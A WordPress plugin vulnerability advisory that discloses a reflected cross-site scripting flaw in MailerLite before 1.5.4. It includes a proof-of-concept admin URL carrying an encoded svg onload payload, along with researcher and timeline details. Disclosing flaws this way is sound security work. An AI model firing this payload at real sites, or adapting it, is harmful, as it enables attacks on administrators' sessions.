WordPress Plugin Vulnerabilities

MailerLite < 1.5.4 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting

Proof of Concept

The first digit of the ID must be an existing form ID

https://example.com/wp-admin/admin.php?page=mailerlite_main&view=edit&id=1%22%3Eaaaa%3Csvg%2Fonload%3Dprompt%281%29%3E

Affects Plugins

References

Classification

Type
XSS
CWE

Miscellaneous

Original Researcher
Utkarsh Agrawal
Submitter
Utkarsh Agrawal
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2022-05-18 (about 2 years ago)
Added
2022-05-18 (about 2 years ago)
Last Updated
2022-05-19 (about 2 years ago)

Other